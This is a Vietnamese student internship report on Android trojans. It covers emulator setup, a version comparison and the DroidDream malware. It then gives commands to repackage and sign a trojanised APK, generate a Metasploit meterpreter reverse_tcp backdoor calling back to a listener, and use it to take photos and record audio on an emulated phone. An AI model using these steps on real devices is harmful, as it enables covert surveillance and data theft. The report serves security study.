Báo Cáo Thực Tập - i.vietnamdoc.neti.vietnamdoc.net/data/file/2015/Thang01/31/Nghien... · >=6 , - . $

Báo Cáo Thực TậpNGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH

CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI

SVTH: Nguyễn Duy Tín

TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TINKHOA KỸ THUẬT MÁY TÍNH

--------------------------------

BÁO CÁO ĐỀ TÀI THỰC TẬP

NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNHCẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN

ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI

GVHD: VÕ ĐỖ THẮNGSVTH: NGUYỄN DUY TÍNMSSV: 10520044LỚP : KTMT05




LỜI CẢM ƠN

Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với Thầy và các anh chị nhânviên đã tạo điều kiện cho em thực tập ở Athena để thực tập. Và em cũng xin chân thànhcám ơn Thầy Võ Đỗ Thắng đã nhiệt tình hướng dẫn hướng dẫn em hoàn thành tốt khóathực tập.

Trong quá trình thực tập, cũng như là trong quá trình làm bài báo cáo, khó tránh khỏi saisót, rất mong các Thầy bỏ qua. Đồng thời do trình độ lý luận cũng như kinh nghiệm thựctiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhậnđược ý kiến đóng góp của Thầy để em học thêm được nhiều kinh nghiệm .

Em xin chân thành cảm ơn !




ĐÁNH GIÁ CỦA GVHD:

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................

............................................................................................................................................................




MỤC LỤCLỜI CẢM ƠN........................................................................................................................2ĐÁNH GIÁ CỦA GVHD:.................................................................................................... 3LỊCH LÀM VIỆC TẠI TRUNG TÂM.................................................................................5GIỚI THIỆU TRUNG TÂM ATHENA............................................................................... 5NỘI DUNG NHIỆM VỤ CHÍNH ĐƯỢC GIAO.................................................................6I. NGHIÊN CỨUHỆ ĐIỀU HÀNHANDROID TRÊNMÔI TRƯỜNGGIẢ LẬP.............. 81. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập.....................................81.1 Cài đặt Java trên máy tính........................................................................................ 81.2 Download và Cài đặt Eclipse, Android SDK.......................................................... 91.3 Tạo máy AVD (Android Virtual Device).............................................................. 12

2. SO SÁNH SỰ KHÁC NHAUGIỮA CÁC PHIÊN BẢN ANDROID.........................162.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.......................................162.2. Sự khác nhau về giao diện................................................................................... 172.3. Sự khác nhau về tính năng...................................................................................182.4. Sự khác nhau về giao thức mạng..........................................................................18

3. NGHIÊN CỨU CÀI ĐẶT TROJAN, BACKDOOR TRÊN ANDROID (IMATCH)... 184. NGHIÊN CỨU CÁC CHƯƠNG TRÌNH CÓ CHỨAMÃ ĐỘC (iCalendar)..............194.1. Thực trạng..............................................................................................................194.2. Nghiên cứu lỗ hổng bảo mật trên Android..............................................................204.3. Cài đặt trojan trên Android (iCalendar)...................................................................21

5. NGHIÊN CỨU KALI LINUX – SỬ DỤNGKALI LINUXĐỂHACKANDROID...235.1 Tìm hiểu Kali Linux.................................................................................................235.2 Cài đặt Kali Linux trên máy ảo VMWare.................................................................245.3 Tạo mã độc trên Kali Linux để xâm nhập Android............................................... 32

II. THỰC HIỆN TRÊNMÔI TRƯỜNG INTERNET......................................................... 451.TRIỂN KHAI LÊN VPS...............................................................................................451.1 Cài đặt Metasploit lên VPS.................................................................................... 45

2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET................................................ 52KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP..............................................................57




LỊCH LÀM VIỆC TẠI TRUNG TÂM

Sáng thứ 2 4 6 từ 10h đến 14hBắt đầu từ ngày 5/3 đến kết thúc 24/5

GIỚI THIỆU TRUNG TÂM ATHENATrung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thànhlập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệthuyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúcđẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triểnnước nhà .

Lĩnh vực hoạt động chính:

+Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trịmạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổitiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trungtâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàngcủa các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quanchính phủ, tổ chức tài chính..+ Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyêngia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành nhưCục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin TruyềnThông các tỉnh, bưu điện các tỉnh,.,....

+ Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợptác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố HồChí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông,Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......




Đội ngũ giảng viên :

+Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàngđầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế nhưMCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (MicrosoftCertified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham giagiảng dạy tại trung tâm ATHENA+Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức côngnghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt cáccông nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA

Cơ sở vật chất:

+Thiết bị đầy đủ và hiện đại+Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệmới nhất.+Phòng máy rộng rãi, thoáng mát

Dịch vụ hỗ trợ:+Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn+Giới thiệu việc làm cho mọi học viên+Thực tập có lương cho học viên khá giỏi+Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thờigian.+Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạngmáy tính, bảo mật mạng+Hỗ trợ thi Chứng chỉ Quốc tế.

NỘI DUNG NHIỆM VỤ CHÍNH ĐƯỢC GIAO

Phần 1

1.Cài đặt Android trên máy ảo

2.So sánh tính năng Android 2x và 4x

3.Nghiên cứu cài đặt Backdoor, Trojan cho phép nghe lén điện thoại




4.Nghiên cứu các chương trình có mã độc(iealender)

5.Nghien cứu Kali-Linux, các cơ chế tạo mã độc trên Kali-Linux==>> xâm nhập thẻsdcard, kích hoạt camera,ghi âm trên thiết bị Andoid

6.Truyền dữ liệu trên thẻ sdcard, camera, về máy điều khiển từ xa

Phần 2

1.Hướng dẫn cài đặt Metasploit lên VPS

2. Sử dụng VPS để tấn công Android trên phạm vi Internet




I. NGHIÊN CỨUHỆĐIỀUHÀNHANDROID TRÊNMÔI TRƯỜNGGIẢ LẬP.

1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập.

1.1 Cài đặt Java trên máy tính.Để có thể lập trình được App cho Android thì trên máy tính của bạn phải đặt toàn bộ JDK.Bạn có thể download bộ JDK tại địa chỉ : tại đây.(Tùy vào phiên bản windows của bạn là 32bit hay là 64bit bạn cần download cho phù hợp)

Sau khi tải bộ JDK về máy. các bạn tiến hành cài đặt chúng.

Xuất hiện cửa dổ cài đặt, các bạn cứ ấn Next…

Và đợi cho tới khi quá trình cài đặt hoàn tất.

http://www.oracle.com/technetwork/java/javase/downloads/index.html

http://www.oracle.com/technetwork/java/javase/downloads/index.html




Sau khi cài xong, các bạn có thể kiểm tra lại xem bộ JDK đã cài được trên máy tính củabạn chưa bẳng cách vào CMD và gõ lệnh: “java”Nếu màn hình hiện ra như sau là bạn đã hoàn thành rồi:




1.2 Download và Cài đặt Eclipse, Android SDK.Trước tiên ta phải download bộ Eclipse.Các bạn vào địa chỉ : http://developer.android.com/sdk/index.htmlDownload bộ cài đầy đủ bao gồm Eclipse và Android SDK : ADT Bundle forWindows

Sau khi download về, các bạn giải nén ra và sẽ có các file như sau :

Để cài đặt Android SDK các bạn có 2 cách:Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và tiến hành cài đặt.Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK Manager cũng được:

http://developer.android.com/sdk/index.html

http://developer.android.com/sdk/index.html




Sẽ xuất hiện 1 cửa sổ mới như sau :




Công việc tiếp theo là các bạn chỉ cần tích chọn các phần API cần cài rồi click vàonút :Install packages ở góc dưới bên phải và chờ cho nó download và cài đặt là xong.

1.3 Tạo máy AVD (Android Virtual Device).Đầu tiên bạn khởi chạy Eclipse lên.

Các bạn có thể xem hướng dẫn cách cài đặt Eclipse và Android SDK ở phần hướngdẫn trước.Hoặc bạn cũng có thể tham khảo thêm tạo 1 máy ảo Android trên Virtualbox mình đãhướng dẫn chi tiết ở bài trước.Sau khi khởi chạy xong Eclipse. Bạn vào :Windows ->Android VirtualDevice Manager.Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu của Eclipse :

http://www.goclaptrinh.com/huong-dan-cai-dat-eclipse-de-lap-trinh-android.html

http://www.goclaptrinh.com/tao-may-ao-android-tren-virtualbox-don-gian-voi-androvm.html




Click vào New để tạo mới :

Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu :




AVD Name : Các bạn chỉ được sử dụng cách ký tự : A -> Z, a -> z, và “., -, _” mà thôi.Target : Bạn chọn phiên bản Android để test.SD Card : Là dung lượng bộ nhớ ảo của thẻ SD.Và một số thông tin khác…

Các bạn click OK để hoàn thành tạo mới một AVD.

Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì bạn sẽ thấy tênmáy ảo mới mình vừa tạo rồi.Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời gian để máy ảokhởi chạy) :




Và đây là giao diện cuối cùng :




2. SO SÁNH SỰKHÁC NHAUGIỮA CÁC PHIÊN BẢNANDROID

2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.

Android 2.3 Android 4x

Cần ít nhất 128 MB bộ nhớ có sẵn choKernel và cho không gian người sử dụng

Cần ít nhất 340 MB bộ nhớ có sẵn cho kernelvà cho không gian người sử dụng

Dung lượng Ram tối thiểu cần thiết là150MB

Dung lượng Ram tối thiểu cần thiết là 350MB

Màn hình:

- Màn hình phải có kích cỡ ít nhất 2,5inch

- Mật độ phải được ít nhất 100 dpi- Tỉ lệ màn hình từ 1.333 (4:3) đến1,779 (16:9)

- Công nghệ màn hình được sử dụng làcông nghệ “ Square pixels”

Màn hình:

- Màn hình phải có kích cỡ ít nhất426x320

- Mật độ phải được ít nhất 100 dpi- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85(16:9)




Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý

Các API Android bao gồm trình quản lýdownload các ứng dụng có thể sử dụng để tảidữ liệu.Trình quản lí download phải có khảnăng tải tập tin có dung lượng ít nhất 55 MB

Các API Android bao gồm trình quản lýdownload các ứng dụng có thể sử dụng để tảidữ liệu.Trình quản lí download phải có khảnăng tải tập tin có dung lượng ít nhất 100MB

2.2. Sự khác nhau về giao diện.Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảmứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thulại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễnra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năngrung của thiết bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bêntrong như gia tốc kế, con quay hồi chuyển và cảm biến khoảng cách được một số ứngdụng sử dụng để phản hồi một số hành động khác của người dùng, ví dụ như điều chỉnh mànhình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc chophép người dùng lái xe đua bằng xoay thiết bị, giống như Các thiết bị Android sau khikhởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các thông tin chính trênthiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn. Mànhính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượngứng dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động,cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc nhữngmẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang xemđược bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android cóthể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vicủa thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và cáckho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính,thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn.Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vicủa các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía trên cùng mànhình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết nối. Thanh trạngthái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng hoặccập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm giánđoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùngcó thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhậtđược bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡmà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người

http://vi.wikipedia.org/w/index.php?title=Ph%E1%BA%A3n_h%E1%BB%93i_rung&action=edit&redlink=1

http://vi.wikipedia.org/w/index.php?title=Ph%E1%BA%A3n_h%E1%BB%93i_rung&action=edit&redlink=1

http://vi.wikipedia.org/w/index.php?title=Gia_t%E1%BB%91c_k%E1%BA%BF&action=edit&redlink=1

http://vi.wikipedia.org/w/index.php?title=Gia_t%E1%BB%91c_k%E1%BA%BF&action=edit&redlink=1

http://vi.wikipedia.org/w/index.php?title=C%E1%BA%A3m_bi%E1%BA%BFn_kho%E1%BA%A3ng_c%C3%A1ch&action=edit&redlink=1

http://vi.wikipedia.org/wiki/Desktop

http://vi.wikipedia.org/w/index.php?title=Google_Play&action=edit&redlink=1

http://vi.wikipedia.org/wiki/Windows_Phone

http://vi.wikipedia.org/wiki/SMS




dùng đã đọc hoặc xóa nó đi.


Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắthơn

Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Zoom

Không có widget menu Có Widget menu giúp tìm nhanh thông tinmà không cần mở ứng dụng

2.3. Sự khác nhau về tính năng.


Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone vàTablet

Chỉ có thể xóa tất các các thông báo cùnglúc trên trình quản lý

Chỉ có thể xóa riêng rẽ các thông báo cùnglúc trên trình quản lý

Chỉ có thể trả lời, ngắt cuộc gọi khi mànhình bị khóa

Có thể thực hiện thêm 1 số tính năng khimàn hình bị khoái ngoài trả lời , ngắt cuộcgọi như gửi tin nhắn

Không có tính năng mở khóa màn hình nhậndiện khuôn mặt

Có tính năng mở khóa màn hình nhận diệnkhuôn mặt

Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhậndiện được tất cả các camera trên thiết bị

2.4. Sự khác nhau về giao thức mạng.


Không hỗ trợ giao thức https Hỗ trợ giao thức https

3. NGHIÊN CỨUCÀI ĐẶT TROJAN, BACKDOORTRÊNANDROID (IMATCH)

Ứng dụng iMatch đã được minh họa cách cài đặt qua clip đính kèm




4. NGHIÊN CỨUCÁC CHƯƠNG TRÌNHCÓ CHỨAMÃĐỘC (iCalendar)

4.1. Thực trạngMột báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã độc trênAndroid - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng mã độcmới được phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng Android.Đây là một con số báo động về tình trạng mã độc trên nền tảng di động của Google vừađược hãng bảo mật Kaspersky Lab công bố.

Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ yếu đểsử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ những tinnhắn lừa đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn cắp thôngtin như là mật khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được cho phép, …..Loại mã độc này chiếm đến 63% tổng số các loại mã độc mới được phát tán trên Androidtrong quý I năm 2013.

Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số lượngcác mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013,Kaspersky đã phát hiện được số lượng mã độc mới trên các nền tảng di động bằng tổngsố lượng mã độc được phát hiện trong cả năm 2012 mà Android là nền tảng chịu ảnhhưởng nặng nhất.

Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các loạimã độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực bảomật, khi sự phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc, đồngthời việc quản lý các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện cho mãđộc được phát tán dễ dàng hơn trên nền tảng di động này.

Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong quýI/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc chủ yếudựa vào việc phát tán các đường link trang web có chứa mã độc. Các đường link cóchứa mã độc này chủ yếu được phát tán thông qua email và trên các mạng xã hội nhưFacebook, Twitter… Đây được xem là biện pháp được yêu thích nhất hiện nay củahacker.




4.2. Nghiên cứu lỗ hổng bảo mật trên Android.

4.2.1. Malware trên Android.Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềmmáy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sửdụng không hề hay biết.Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉdừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lâylan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt độnggiống như một phần mềm gián điệp (Trojan) hơn là một virusphá hủy.

4.2.2 Cơ chế hoạt động của Malware.Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là MalwareDroidDream. Malware này hoạt động qua 2 giai đoạn:

- Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụngchứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiếtbị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.

- Giai đoạn 2 : Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phépquyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tinnhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khiDroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt mộtứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc càiđặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứngdụng mà không được phép.

Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lâynhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm,checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó làMalware DroidDream này được lập trình để làm hầu hết các công việc của mình vàokhoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điệnthoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơntrong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình.

Mục đích của Malware DroidDream




DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích củacon DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùngtự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịpthời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS đượctìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng,việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà ngườidùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa racác ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMSgửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửitới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này.

Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại.Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị mộttheo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến ansự an toàn của người dùng hệ điều hành này.

4.3. Cài đặt trojan trên Android (iCalendar)1.Dùng công cụ apktool để chỉnh sửa file apk

apktool if name.apkapktool d name.apkapktool b name

2.Signing ứng dụng, tạo chữ ký điện tử để thiết bị có thể sử dụng được ứng dụng

keytool -genkey -v -keystore name-name.keystore -alias name -keyalg RSA -keysize 2048 -validity 10000

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore name-name.keystore name.apk name

jarsigner -verify -verbose -certs name.apk

3.Cài đặt ứng dụng lên máy nạn nhân

adb -s emulator-device install name.apk

Demo cài đặt ứng dụng Icalendar và đã được minh họa trên clip đính kèm




5. NGHIÊN CỨUKALI LINUX – SỬ DỤNGKALI LINUXĐỂHACKANDROID

5.1 Tìm hiểu Kali LinuxKali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm trabảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux làBackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sửdụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã côngbố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bảnBackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu màbất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So vớiBackTrack, Kali có rất nhiều cải tiến:Kali phát triển trên nền tảng hệ điều hành Debian

Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ

phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được

các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật

(up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.

Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của

Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ

thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc

thay đổi mã nguồn của các công cụ.

Tính tương thích kiến trúc

Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc

ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể

build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.

Hỗ trợ mạng không dây tốt hơn

Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ

trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB




Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng

không dây.

Khả năng tùy biến cao

Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao

diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME,

KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.

Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành

Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều

phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).

Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ

dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không

phải cài lại mới hoàn toàn nữa

5.2 Cài đặt Kali Linux trên máy ảo VMWareTrước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài nàyta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. http://www.kali.org/downloads/

http://www.kali.org/downloads/




Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìmtrên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo.Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trêncửa sổ mới mở, chọn custom và nhấn next

Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó:




Đặt tên và đặt đường dẫn cho máy ảo

Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định.




Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install

Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường...Tiếp theo chọn Root password, luôn nhớ Root password đã chọn!

Phần Partition chọn Guided – use entire disk và All files in one partition




Chọn Finish partitioning and write changes to disk




Chọn Yes




Nhấn continue để bắt đầu cài đặt khoảng 15 phút.

Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.




Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root vàpassword đã đặt ở phần trước.Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware




5.3 Tạo mã độc trên Kali Linux để xâm nhập AndroidTa sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy androidtải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo KaliLinux bằng Vmware, ta nên thiết lập phần Network như sau:Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware




Bấm vào Network Adapter và chọn Bridged: connection directly to the physicalnetwork

Bấm vào Edit -> Virtual Network Editor...




Trên phần Bridge (connect VMs directly to the external network) chọn adapter củamáy thật




Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển androidĐầu tiên mở terminal và gõ dòng lệnhMsfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R >/root/Desktop/files.apk

192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP củamáy Kali

8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng




Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploitreverse tcp backdoor.

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõlệnh sau:use exploit/multi/handler




set payload android/meterpreter/reverse_tcpset lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.set lport 8080 – nhập port giống với port khi tạo payload ở trên.ExploitMàn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao diệnnhư dưới, nhấp vào nút reverse_tcp:







Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Để xem thông tin về máy, nhập lệnh SysInfo Sử dụng camera:Để xem danh sách camera, nhập webcam_list




Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ởdanh sách camera ở phần trước. Ví dụ như sau:




File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /rootcủa máy

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

